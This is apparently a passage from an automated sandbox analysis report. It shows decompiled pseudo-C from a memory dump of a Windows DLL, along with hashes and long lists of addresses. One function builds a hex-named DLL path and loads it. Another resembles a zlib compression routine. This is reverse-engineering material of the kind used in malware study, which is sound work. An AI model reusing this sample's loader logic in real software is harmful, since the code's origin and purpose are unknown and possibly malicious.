                                                                                                                                                                                                				void* _t60;
                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                				char _t62;
                                                                                                                                                                                                				char* _t63;
                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                				char _t68;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t65 = __esi;
                                                                                                                                                                                                				_t61 = __edi;
                                                                                                                                                                                                				_t47 = __ebx;
                                                                                                                                                                                                				_t50 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                				_t1 = _t50 + 0x1898; // 0x0
                                                                                                                                                                                                				_t14 =  *_t1;
                                                                                                                                                                                                				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                                                					_t15 = E100095C2(_t50, 0xb62);
                                                                                                                                                                                                					_t66 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					_t62 = _t15;
                                                                                                                                                                                                					_t67 = _t66 + 0xb0;
                                                                                                                                                                                                					_v8 = _t62;
                                                                                                                                                                                                					E10009621( &_v140, 0x40, L"%08x", E1000D442(_t66 + 0xb0, E1000C3BB(_t66 + 0xb0), 0));
                                                                                                                                                                                                					_t20 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					_t7 = _t20 + 0xa8; // 0x1
                                                                                                                                                                                                					asm("sbb eax, eax");
                                                                                                                                                                                                					_t25 = E100095C2(_t67, ( ~( *_t7) & 0x00000068) + 0x615);
                                                                                                                                                                                                					_t63 = "\\";
                                                                                                                                                                                                					_t26 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					_t68 = E100092C6(_t26 + 0x1020);
                                                                                                                                                                                                					_v12 = _t68;
                                                                                                                                                                                                					E100085B6( &_v8);
                                                                                                                                                                                                					_t32 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					_t34 = E100092C6(_t32 + 0x122a);
                                                                                                                                                                                                					 *0x1001e784 = _t34;
                                                                                                                                                                                                					_t35 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                                                					_t37 = LoadLibraryW( *0x1001e784);
                                                                                                                                                                                                					 *0x1001e77c = _t37;
                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                						_t38 = 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_push(_t37);
                                                                                                                                                                                                						_t60 = 0x28;
                                                                                                                                                                                                						_t38 = E1000E1B3(0x1001bb40, _t60);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					 *0x1001e780 = _t38;
                                                                                                                                                                                                					E100085FB( &_v12, 0xfffffffe);
                                                                                                                                                                                                					memset( &_v140, 0, 0x80);
                                                                                                                                                                                                					if( *0x1001e780 != 0) {
                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						E100085FB(0x1001e784, 0xfffffffe);
                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					L8:
                                                                                                                                                                                                					if( *0x1001e780 == 0) {
                                                                                                                                                                                                						_t46 =  *0x1001e6bc; // 0x4d2f9a0
                                                                                                                                                                                                						 *0x1001e780 = _t46;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L10:
                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}


                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoadmemset
                                                                                                                                                                                                • String ID: %08x$dll
                                                                                                                                                                                                • API String ID: 3406617148-2963171978
                                                                                                                                                                                                • Opcode ID: 0fa324d484978949f2412eddfb8701fe792442d51342d7a7d31fc4b717d6ab52
                                                                                                                                                                                                • Instruction ID: f0ab40f63ca65c704d24535b20fbc2b9cb4468a6bee591cd299c223ff7611bed
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fa324d484978949f2412eddfb8701fe792442d51342d7a7d31fc4b717d6ab52
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9431B2B2904258ABF710DB64DC89F9E73ECEB58394F408125F505E7195EB74EE808725
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 99%
                                                                                                                                                                                                			E10012DB0(int _a4, signed int _a8) {
                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                				void* _t137;
                                                                                                                                                                                                				signed int _t141;
                                                                                                                                                                                                				intOrPtr* _t142;
                                                                                                                                                                                                				signed int _t145;
                                                                                                                                                                                                				signed int _t146;
                                                                                                                                                                                                				intOrPtr _t151;
                                                                                                                                                                                                				intOrPtr _t161;
                                                                                                                                                                                                				intOrPtr _t162;
                                                                                                                                                                                                				intOrPtr _t167;
                                                                                                                                                                                                				intOrPtr _t170;
                                                                                                                                                                                                				signed int _t172;
                                                                                                                                                                                                				intOrPtr _t173;
                                                                                                                                                                                                				int _t184;
                                                                                                                                                                                                				intOrPtr _t185;
                                                                                                                                                                                                				intOrPtr _t188;
                                                                                                                                                                                                				signed int _t189;
                                                                                                                                                                                                				void* _t195;
                                                                                                                                                                                                				int _t202;
                                                                                                                                                                                                				int _t208;
                                                                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                                                                				signed int _t218;
                                                                                                                                                                                                				int _t219;
                                                                                                                                                                                                				intOrPtr _t220;
                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                				signed int _t222;
                                                                                                                                                                                                				int _t224;
                                                                                                                                                                                                				int _t225;
                                                                                                                                                                                                				signed int _t227;
                                                                                                                                                                                                				intOrPtr _t228;
                                                                                                                                                                                                				int _t232;
                                                                                                                                                                                                				int _t234;
                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                				int _t239;
                                                                                                                                                                                                				void* _t240;
                                                                                                                                                                                                				int _t245;
                                                                                                                                                                                                				int _t252;
                                                                                                                                                                                                				signed int _t253;
                                                                                                                                                                                                				int _t254;
                                                                                                                                                                                                				void* _t257;
                                                                                                                                                                                                				void* _t258;
                                                                                                                                                                                                				int _t259;
                                                                                                                                                                                                				intOrPtr _t260;
                                                                                                                                                                                                				int _t261;
                                                                                                                                                                                                				signed int _t269;
                                                                                                                                                                                                				signed int _t271;
                                                                                                                                                                                                				intOrPtr* _t272;
                                                                                                                                                                                                				void* _t273;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t253 = _a8;
                                                                                                                                                                                                				_t272 = _a4;
                                                                                                                                                                                                				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                				_t228 =  *_t4;
                                                                                                                                                                                                				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                                                				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                                                				_t269 = 0;
                                                                                                                                                                                                				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                                                				asm("o16 nop [eax+eax]");
                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                					_t8 = _t272 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                                                					_v12 = 0xffff;
                                                                                                                                                                                                					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                                                					if(_t217 < _t141) {
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                					_t12 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                                                					_v8 = _t245;
                                                                                                                                                                                                					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                                                					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                                                					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                                                					if(_t227 >= _v16) {
                                                                                                                                                                                                						L7:
                                                                                                                                                                                                						if(_t253 != 4) {
                                                                                                                                                                                                							L10:
                                                                                                                                                                                                							_t269 = 0;
                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t285 = _t227 - _t195;
                                                                                                                                                                                                							if(_t227 != _t195) {
                                                                                                                                                                                                								goto L10;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t269 = _t253 - 3;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E10015DD0(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                                                						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                                                						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                                                						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                                                						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                                						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                                						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                                                						E10014B30(_t285,  *_t272);
                                                                                                                                                                                                						_t202 = _v8;
                                                                                                                                                                                                						_t273 = _t273 + 0x14;
                                                                                                                                                                                                						if(_t202 != 0) {
                                                                                                                                                                                                							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                                                							_v8 = _t208;
                                                                                                                                                                                                							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							_t37 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							_t252 = _v8;
                                                                                                                                                                                                							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                                                							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                                                							_t227 = _t227 - _t252;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_t227 != 0) {
                                                                                                                                                                                                							E10014C70( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                                                							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t253 = _a8;
                                                                                                                                                                                                						if(_t269 == 0) {
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                                                							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                                                								goto L7;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					break;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t142 =  *_t272;
                                                                                                                                                                                                				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                                                				_a4 = _t232;
                                                                                                                                                                                                				if(_t232 == 0) {
                                                                                                                                                                                                					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                					_t254 =  *_t83;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                					_t224 =  *_t59;
                                                                                                                                                                                                					if(_t232 < _t224) {
                                                                                                                                                                                                						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                						_t260 =  *_t66;
                                                                                                                                                                                                						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                                                						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                                                							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							_t261 = _t260 - _t224;
                                                                                                                                                                                                							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                                                							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                                                							_t70 = _t272 + 0x16b0; // 0x7e89ffff
                                                                                                                                                                                                							_t188 =  *_t70;
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							_t232 = _a4;
                                                                                                                                                                                                							__eflags = _t188 - 2;
                                                                                                                                                                                                							if(_t188 < 2) {
                                                                                                                                                                                                								_t189 = _t188 + 1;
                                                                                                                                                                                                								__eflags = _t189;
                                                                                                                                                                                                								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                                                						_t225 = _a4;
                                                                                                                                                                                                						_t273 = _t273 + 0xc;
                                                                                                                                                                                                						_t76 = _t272 + 0x6c;
                                                                                                                                                                                                						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                                                						__eflags =  *_t76;
                                                                                                                                                                                                						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                						_t184 =  *_t78;
                                                                                                                                                                                                						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                						_t239 =  *_t79;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                                                						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                                                						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                						_t184 =  *_t62;
                                                                                                                                                                                                						_t273 = _t273 + 0xc;
                                                                                                                                                                                                						_t225 = _a4;
                                                                                                                                                                                                						_t239 = _t184;
                                                                                                                                                                                                						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t254 = _t184;
                                                                                                                                                                                                					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                                                					_t81 = _t272 + 0x16b4; // 0x3c468b3c
                                                                                                                                                                                                					_t185 =  *_t81;
                                                                                                                                                                                                					_t240 = _t239 - _t185;
                                                                                                                                                                                                					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                                                					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                                                					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(_t269 == 0) {
                                                                                                                                                                                                					_t218 = _a8;
                                                                                                                                                                                                					__eflags = _t218;
                                                                                                                                                                                                					if(_t218 == 0) {
                                                                                                                                                                                                						L34:
                                                                                                                                                                                                						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                                						_t219 =  *_t272;
                                                                                                                                                                                                						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                                                						_a4 =  *_t272;
                                                                                                                                                                                                						_t234 = _t254;
                                                                                                                                                                                                						_v16 = _t145;
                                                                                                                                                                                                						_v8 = _t254;
                                                                                                                                                                                                						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                                                						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                                                							_v8 = _t254;
                                                                                                                                                                                                							_t95 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                							_a4 = _t219;
                                                                                                                                                                                                							_t234 = _t254;
                                                                                                                                                                                                							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                                                							if( *_t95 >=  *_t97) {
                                                                                                                                                                                                								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                								_t167 =  *_t98;
                                                                                                                                                                                                								_t259 = _t254 - _t167;
                                                                                                                                                                                                								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                                                								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                                                								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                                                								_t103 = _t272 + 0x16b0; // 0x7e89ffff
                                                                                                                                                                                                								_t170 =  *_t103;
                                                                                                                                                                                                								_t273 = _t273 + 0xc;
                                                                                                                                                                                                								__eflags = _t170 - 2;
                                                                                                                                                                                                								if(_t170 < 2) {
                                                                                                                                                                                                									_t172 = _t170 + 1;
                                                                                                                                                                                                									__eflags = _t172;
                                                                                                                                                                                                									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                								_t145 = _v16 +  *_t106;
                                                                                                                                                                                                								__eflags = _t145;
                                                                                                                                                                                                								_a4 =  *_t272;
                                                                                                                                                                                                								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                								_t234 =  *_t108;
                                                                                                                                                                                                								_v8 = _t234;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t255 = _a4;
                                                                                                                                                                                                						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                                                						__eflags = _t145 - _t220;
                                                                                                                                                                                                						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                                                						_t146 = _t221;
                                                                                                                                                                                                						_a4 = _t221;
                                                                                                                                                                                                						_t222 = _a8;
                                                                                                                                                                                                						__eflags = _t146;
                                                                                                                                                                                                						if(_t146 != 0) {
                                                                                                                                                                                                							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							E10014C70(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                                                							_t273 = _t273 + 0xc;
                                                                                                                                                                                                							_t117 = _t272 + 0x6c;
                                                                                                                                                                                                							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                                                							__eflags =  *_t117;
                                                                                                                                                                                                							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                                							_t234 =  *_t119;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                                                						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                                                							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t122 = _t272 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                                						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                                                						__eflags = _t257 - 0xffff;
                                                                                                                                                                                                						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                                                						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                                						_t151 =  *_t124;
                                                                                                                                                                                                						_t125 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                						_t235 = _t234 -  *_t125;
                                                                                                                                                                                                						__eflags = _t258 - _t151;
                                                                                                                                                                                                						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                                                						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                                                						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                                                							L49:
                                                                                                                                                                                                							__eflags = _t235 - _t258;
                                                                                                                                                                                                							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                                                							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                                                							__eflags = _t222 - 4;
                                                                                                                                                                                                							if(_t222 != 4) {
                                                                                                                                                                                                								L53:
                                                                                                                                                                                                								_t269 = 0;
                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t161 =  *_t272;
                                                                                                                                                                                                								__eflags =  *(_t161 + 4);
                                                                                                                                                                                                								_t154 = _a4;
                                                                                                                                                                                                								if( *(_t161 + 4) != 0) {
                                                                                                                                                                                                									goto L53;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									__eflags = _t154 - _t235;
                                                                                                                                                                                                									if(_t154 != _t235) {
                                                                                                                                                                                                										goto L53;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t269 = _t222 - 3;
                                                                                                                                                                                                									}
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                                							_t132 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                							E10015DD0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                                                							_t134 = _t272 + 0x5c;
                                                                                                                                                                                                							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                                							__eflags =  *_t134;
                                                                                                                                                                                                							E10014B30( *_t134,  *_t272);
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							__eflags = _t235;
                                                                                                                                                                                                							if(_t235 != 0) {
                                                                                                                                                                                                								L46:
                                                                                                                                                                                                								__eflags = _t222;
                                                                                                                                                                                                								if(_t222 != 0) {
                                                                                                                                                                                                									_t162 =  *_t272;
                                                                                                                                                                                                									__eflags =  *(_t162 + 4);
                                                                                                                                                                                                									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                                										__eflags = _t235 - _t258;
                                                                                                                                                                                                										if(_t235 <= _t258) {
                                                                                                                                                                                                											goto L49;
                                                                                                                                                                                                										}
                                                                                                                                                                                                									}
                                                                                                                                                                                                								}
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								__eflags = _t222 - 4;
                                                                                                                                                                                                								if(_t222 == 4) {
                                                                                                                                                                                                									goto L46;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						asm("sbb edi, edi");
                                                                                                                                                                                                						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                                						__eflags = _t271;
                                                                                                                                                                                                						return _t271;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						__eflags = _t218 - 4;
                                                                                                                                                                                                						if(_t218 == 4) {
                                                                                                                                                                                                							goto L34;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							_t173 =  *_t272;
                                                                                                                                                                                                							__eflags =  *(_t173 + 4);
                                                                                                                                                                                                							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                                								goto L34;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t88 = _t272 + 0x5c; // 0x23e85000
                                                                                                                                                                                                								__eflags = _t254 -  *_t88;
                                                                                                                                                                                                								if(_t254 !=  *_t88) {
                                                                                                                                                                                                									goto L34;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									return 1;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					return 3;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}






















































                                                                                                                                                                                                0x10012f03
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012e27
                                                                                                                                                                                                0x10012e29
                                                                                                                                                                                                0x10012e36
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012e36
                                                                                                                                                                                                0x10012e29
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012e25
                                                                                                                                                                                                0x10012f09
                                                                                                                                                                                                0x10012f0e
                                                                                                                                                                                                0x10012f11
                                                                                                                                                                                                0x10012f14
                                                                                                                                                                                                0x10012fbf
                                                                                                                                                                                                0x10012fbf
                                                                                                                                                                                                0x10012f1a
                                                                                                                                                                                                0x10012f1a
                                                                                                                                                                                                0x10012f1a
                                                                                                                                                                                                0x10012f1f
                                                                                                                                                                                                0x10012f49
                                                                                                                                                                                                0x10012f4c
                                                                                                                                                                                                0x10012f4c
                                                                                                                                                                                                0x10012f51
                                                                                                                                                                                                0x10012f53
                                                                                                                                                                                                0x10012f55
                                                                                                                                                                                                0x10012f58
                                                                                                                                                                                                0x10012f5b
                                                                                                                                                                                                0x10012f63
                                                                                                                                                                                                0x10012f68
                                                                                                                                                                                                0x10012f68
                                                                                                                                                                                                0x10012f6e
                                                                                                                                                                                                0x10012f71
                                                                                                                                                                                                0x10012f74
                                                                                                                                                                                                0x10012f77
                                                                                                                                                                                                0x10012f79
                                                                                                                                                                                                0x10012f79
                                                                                                                                                                                                0x10012f7a
                                                                                                                                                                                                0x10012f7a
                                                                                                                                                                                                0x10012f77
                                                                                                                                                                                                0x10012f88
                                                                                                                                                                                                0x10012f8b
                                                                                                                                                                                                0x10012f8f
                                                                                                                                                                                                0x10012f94
                                                                                                                                                                                                0x10012f97
                                                                                                                                                                                                0x10012f9a
                                                                                                                                                                                                0x10012f9a
                                                                                                                                                                                                0x10012f9a
                                                                                                                                                                                                0x10012f9d
                                                                                                                                                                                                0x10012f9d
                                                                                                                                                                                                0x10012fa0
                                                                                                                                                                                                0x10012fa0
                                                                                                                                                                                                0x10012f21
                                                                                                                                                                                                0x10012f21
                                                                                                                                                                                                0x10012f31
                                                                                                                                                                                                0x10012f34
                                                                                                                                                                                                0x10012f39
                                                                                                                                                                                                0x10012f39
                                                                                                                                                                                                0x10012f3c
                                                                                                                                                                                                0x10012f3f
                                                                                                                                                                                                0x10012f42
                                                                                                                                                                                                0x10012f44
                                                                                                                                                                                                0x10012f44
                                                                                                                                                                                                0x10012fa3
                                                                                                                                                                                                0x10012fa5
                                                                                                                                                                                                0x10012fa8
                                                                                                                                                                                                0x10012fa8
                                                                                                                                                                                                0x10012fae
                                                                                                                                                                                                0x10012fb2
                                                                                                                                                                                                0x10012fb5
                                                                                                                                                                                                0x10012fb7
                                                                                                                                                                                                0x10012fb7
                                                                                                                                                                                                0x10012fc8
                                                                                                                                                                                                0x10012fca
                                                                                                                                                                                                0x10012fca
                                                                                                                                                                                                0x10012fd2
                                                                                                                                                                                                0x10012fe0
                                                                                                                                                                                                0x10012fe3
                                                                                                                                                                                                0x10012fe5
                                                                                                                                                                                                0x10013005
                                                                                                                                                                                                0x10013005
                                                                                                                                                                                                0x10013008
                                                                                                                                                                                                0x1001300e
                                                                                                                                                                                                0x1001300f
                                                                                                                                                                                                0x10013012
                                                                                                                                                                                                0x10013014
                                                                                                                                                                                                0x10013017
                                                                                                                                                                                                0x1001301a
                                                                                                                                                                                                0x1001301d
                                                                                                                                                                                                0x10013021
                                                                                                                                                                                                0x10013024
                                                                                                                                                                                                0x10013027
                                                                                                                                                                                                0x1001302a
                                                                                                                                                                                                0x1001302c
                                                                                                                                                                                                0x1001302c
                                                                                                                                                                                                0x1001302f
                                                                                                                                                                                                0x10013031
                                                                                                                                                                                                0x10013031
                                                                                                                                                                                                0x10013034
                                                                                                                                                                                                0x10013036
                                                                                                                                                                                                0x10013039
                                                                                                                                                                                                0x10013041
                                                                                                                                                                                                0x10013044
                                                                                                                                                                                                0x10013049
                                                                                                                                                                                                0x10013049
                                                                                                                                                                                                0x1001304f
                                                                                                                                                                                                0x10013052
                                                                                                                                                                                                0x10013055
                                                                                                                                                                                                0x10013057
                                                                                                                                                                                                0x10013057
                                                                                                                                                                                                0x10013058
                                                                                                                                                                                                0x10013058
